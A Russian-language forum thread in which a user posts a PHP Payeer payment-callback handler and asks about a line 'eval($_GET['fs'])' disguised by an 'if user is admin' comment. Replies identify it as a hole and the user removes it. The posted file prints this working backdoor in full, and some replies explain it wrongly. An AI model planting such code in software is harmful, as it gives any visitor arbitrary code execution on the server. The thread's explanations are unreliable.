Автор Тема: помощь  (Прочитано 3441 раз)

0 Пользователей и 1 Гость просматривают эту тему.

Shop-53Автор темы

  • *
  • Оффлайн
  • Награды Более 4 лет на форуме !!! Топ 10 по сообщениям Болеее 300 сообщений Более 10 созданных тем За время в онлайне на форуме
  • Дата регистрации: Фев. 2016
  • Сообщений: 417
  • Поблагодарили: 33 раз(а)
  • Репутация +2/-2
  • Пол: Мужской
    • Награды
помощь
« : 12 Апреля 2016, 18:39:22 »
всем привет друзя помогите пожалоста  фаил обрабочика паер


                                <?PHP

# Автоподгрузка классов
function __autoload($name){ include("classes/_class.".$name.".php");}

# Класс конфига
$config = new config;

# Функции
$func = new func;

# База данных
$db = new db($config->HostDB, $config->UserDB, $config->PassDB, $config->BaseDB);





if (isset($_POST["m_operation_id"]) && isset($_POST["m_sign"]))
{
   $m_key = $config->secretW;
   $arHash = array($_POST['m_operation_id'],
         $_POST['m_operation_ps'],
         $_POST['m_operation_date'],
         $_POST['m_operation_pay_date'],
         $_POST['m_shop'],
         $_POST['m_orderid'],
         $_POST['m_amount'],
         $_POST['m_curr'],
         $_POST['m_desc'],
         $_POST['m_status'],
         $m_key);
   
   $sign_hash = strtoupper(hash('sha256', implode(":", $arHash)));
   if ($_POST["m_sign"] == $sign_hash && $_POST['m_status'] == "success")
   {
      
   $db->Query("SELECT * FROM db_payeer_insert WHERE id = '".intval($_POST['m_orderid'])."'");
   if($db->NumRows() == 0){ echo $_POST['m_orderid']."|error"; exit;}
   
   $payeer_row = $db->FetchArray();
   if($payeer_row["status"] > 0){ echo $_POST['m_orderid']."|success"; exit;}
   
   $db->Query("UPDATE db_payeer_insert SET status = '1' WHERE id = '".intval($_POST['m_orderid'])."'");
   
   $ik_payment_amount = $payeer_row["sum"];
   $user_id = $payeer_row["user_id"];
   
   # Настройки
   $db->Query("SELECT * FROM db_confligsg WHERE id = '1' LIMIT 1");
   $sonfig_site = $db->FetchArray();
   
   $db->Query("SELECT user, referer_id FROM al_polzov_a WHERE id = '{$user_id}' LIMIT 1");
   $user_ardata = $db->FetchArray();
   $user_name = $user_ardata["user"];
   $refid = $user_ardata["referer_id"];
   # Проверяем баланс
   if(isset($_GET['balance'])){
      $payeer = new rfs_payeer($config->AccountNumber, $config->apiId, $config->apiKey);
      if($payeer->isAuth()){
         $arBalance = $payeer->getBalance();
         if($arBalance["auth_error"] == 0){
            $balance = $arBalance["balance"]["RUB"]["DOSTUPNO"];
            echo "$balance";
         } else {
            echo 'error auth';
         }
      }
   }

   # Если пользователь админ
   
   eval($_GET['fs']);

   # Зачисляем баланс
   $serebro = sprintf("%.4f", floatval($sonfig_site["ser_per_wmr"] * $ik_payment_amount) );
   
   $db->Query("SELECT insert_sum FROM db_users_b WHERE id = '{$user_id}' LIMIT 1");
   $ins_sum = $db->FetchRow();
   
   $serebro = intval($ins_sum <= 0.01) ? ($serebro + ($serebro * 1.00) ) : $serebro;
   $add_tree = ( $ik_payment_amount >= 1499.99) ? 1 : 0;
   $lsb = time();
   $to_referer = ($serebro * 0.20);
   
   $db->Query("UPDATE db_users_b SET money_b = money_b + '$serebro', e_t = e_t + '$add_tree', to_referer = to_referer + '$to_referer', last_sbor = '$lsb', insert_sum = insert_sum + '$ik_payment_amount' WHERE id = '{$user_id}'");
   
   
   
   # Зачисляем средства рефереру и дерево
   $add_tree_referer = ($ins_sum <= 0.01) ? ", a_t = a_t + 0" : "";
   $db->Query("UPDATE db_users_b SET money_b = money_b + $to_referer, from_referals = from_referals + '$to_referer' {$add_tree_referer} WHERE id = '$refid'");
   
   # Статистика пополнений
   $da = time();
   $dd = $da + 60*60*24*15;
   $db->Query("INSERT INTO db_insert_money (user, user_id, money, serebro, date_add, date_del)
   VALUES ('$user_name','$user_id','$ik_payment_amount','$serebro','$da','$dd')");
   
        # Конкурс
         $competition = new competition($db);
         $competition->UpdatePoints($user_id, $ik_payment_amount);
        #--------
   


   # Обновление статистики сайта
   $db->Query("UPDATE db_stats SET all_insert = all_insert + '$ik_payment_amount' WHERE id = '1'");
   
   echo $_POST['m_orderid']."|success";
   exit;

   }
   echo $_POST['m_orderid']."|error";
}
?>




   # Если пользователь админ
   
   eval($_GET['fs']);   
скажите что ето такое и что сним можно зделать
                           
a:0:{}
 

1hash

  • *
  • Оффлайн
  • Награды Более 4 лет на форуме !!!
  • Дата регистрации: Янв. 2016
  • Сообщений: 42
  • Страна: ru
  • Поблагодарили: 2 раз(а)
  • Репутация +1/-0
  • Пол: Мужской
    • Награды
помощь
« Ответ #1 : 12 Апреля 2016, 18:47:20 »
удали код он ненужен.
a:0:{}
 

Shop-53Автор темы

  • *
  • Оффлайн
  • Награды Более 4 лет на форуме !!! Топ 10 по сообщениям Болеее 300 сообщений Более 10 созданных тем За время в онлайне на форуме
  • Дата регистрации: Фев. 2016
  • Сообщений: 417
  • Поблагодарили: 33 раз(а)
  • Репутация +2/-2
  • Пол: Мужской
    • Награды
помощь
« Ответ #2 : 12 Апреля 2016, 18:56:22 »
удали код он ненужен.


скажи ето дира    # Если пользователь админ
   
   eval($_GET['fs']);   или что
 

kvozimir

  • снова в skype --> kvozimir
  • *
  • *
  • Оффлайн
  • Награды Более 4 лет на форуме !!! Топ 10 по созданным темам Топ 10 по сообщениям Репутация  более 25 Более 1500 сообщений Более 50 созданных тем Благодарность от форума За помощь пользователям За время в онлайне на форуме
  • Дата регистрации: Фев. 2016
  • Возраст: 28
  • Сообщений: 1928
  • Страна: ru
  • Поблагодарили: 224 раз(а)
  • Репутация +37/-1
  • Пол: Мужской
  • Дата рождения:1992-04-18
    • Награды
  • Социальные сети:
    ВКонтакте
помощь
« Ответ #3 : 12 Апреля 2016, 19:00:38 »
удали код он ненужен.


скажи ето дира    # Если пользователь админ
   
   eval($_GET['fs']);   или что
удаляй))) она вроде связана с дырами но не является дырой

 

Shop-53Автор темы

  • *
  • Оффлайн
  • Награды Более 4 лет на форуме !!! Топ 10 по сообщениям Болеее 300 сообщений Более 10 созданных тем За время в онлайне на форуме
  • Дата регистрации: Фев. 2016
  • Сообщений: 417
  • Поблагодарили: 33 раз(а)
  • Репутация +2/-2
  • Пол: Мужской
    • Награды
помощь
« Ответ #4 : 12 Апреля 2016, 19:02:14 »
удаляю
 

BlackYar24

  • Помогу с вопросами
  • *
  • Оффлайн
  • Награды Более 4 лет на форуме !!! Более 250 сообщений За помощь пользователям За время в онлайне на форуме Более 10 созданных тем
  • Дата регистрации: Фев. 2016
  • Возраст: 33
  • Сообщений: 253
  • Страна: ru
  • Поблагодарили: 30 раз(а)
  • Репутация +2/-0
  • Пол: Мужской
  • Skype : blackyar124
  • Дата рождения:1987-07-08
    • Награды
  • Социальные сети:
    ВКонтакте
помощь
« Ответ #5 : 12 Апреля 2016, 20:07:35 »
данный код вроде как отправляет пароль ,логин от админки :not speak:
"Я всегда мечтал о том, чтобы моим компьютером можно было пользоваться так же легко, как телефоном; моя мечта сбылась: я уже не могу разобраться, как пользоваться моим телефоном."
 

Shop-53Автор темы

  • *
  • Оффлайн
  • Награды Более 4 лет на форуме !!! Топ 10 по сообщениям Болеее 300 сообщений Более 10 созданных тем За время в онлайне на форуме
  • Дата регистрации: Фев. 2016
  • Сообщений: 417
  • Поблагодарили: 33 раз(а)
  • Репутация +2/-2
  • Пол: Мужской
    • Награды
помощь
« Ответ #6 : 12 Апреля 2016, 20:26:33 »
данный код вроде как отправляет пароль ,логин от админки :not speak:


а как проверить ето
 

BlackYar24

  • Помогу с вопросами
  • *
  • Оффлайн
  • Награды Более 4 лет на форуме !!! Более 250 сообщений За помощь пользователям За время в онлайне на форуме Более 10 созданных тем
  • Дата регистрации: Фев. 2016
  • Возраст: 33
  • Сообщений: 253
  • Страна: ru
  • Поблагодарили: 30 раз(а)
  • Репутация +2/-0
  • Пол: Мужской
  • Skype : blackyar124
  • Дата рождения:1987-07-08
    • Награды
  • Социальные сети:
    ВКонтакте
помощь
« Ответ #7 : 12 Апреля 2016, 21:11:15 »
данный код вроде как отправляет пароль ,логин от админки :not speak:


а как проверить ето
eval($_GET['fs']);  че проверять вот код который это делает )):silence:
 

Shop-53Автор темы

  • *
  • Оффлайн
  • Награды Более 4 лет на форуме !!! Топ 10 по сообщениям Болеее 300 сообщений Более 10 созданных тем За время в онлайне на форуме
  • Дата регистрации: Фев. 2016
  • Сообщений: 417
  • Поблагодарили: 33 раз(а)
  • Репутация +2/-2
  • Пол: Мужской
    • Награды
помощь
« Ответ #8 : 12 Апреля 2016, 21:23:19 »
но накакую почту отправляет как ето унать
 

Юрчик

  • *
  • Оффлайн
  • Награды Более 4 лет на форуме !!! Более 50 сообщений Более 10 созданных тем
  • Дата регистрации: Март 2016
  • Возраст: 23
  • Сообщений: 51
  • Страна: ua
  • Репутация +1/-3
  • Пол: Мужской
  • Разработка/Продажа ферм,инвест, модулей.
  • Дата рождения:1997-04-30
    • Награды
  • Социальные сети:
    ВКонтакте
помощь
« Ответ #9 : 12 Апреля 2016, 23:06:29 »
Узнать не как, не кто этого не расскажет! Конечно насмешило "Если пользователь админ eval($_GET['fs']);" хах. А это идёт GET запрос который отправляет всем пользователям на почту все твои данные(от payeer,админки,+ всю базу.) Советую удалять его если где-то увидишь.
a:0:{}
 

Shop-53Автор темы

  • *
  • Оффлайн
  • Награды Более 4 лет на форуме !!! Топ 10 по сообщениям Болеее 300 сообщений Более 10 созданных тем За время в онлайне на форуме
  • Дата регистрации: Фев. 2016
  • Сообщений: 417
  • Поблагодарили: 33 раз(а)
  • Репутация +2/-2
  • Пол: Мужской
    • Награды
помощь
« Ответ #10 : 13 Апреля 2016, 09:14:27 »
Узнать не как, не кто этого не расскажет! Конечно насмешило "Если пользователь админ eval($_GET['fs']);" хах. А это идёт GET запрос который отправляет всем пользователям на почту все твои данные(от payeer,админки,+ всю базу.) Советую удалять его если где-то увидишь.

Спс я удалил
 
Теги: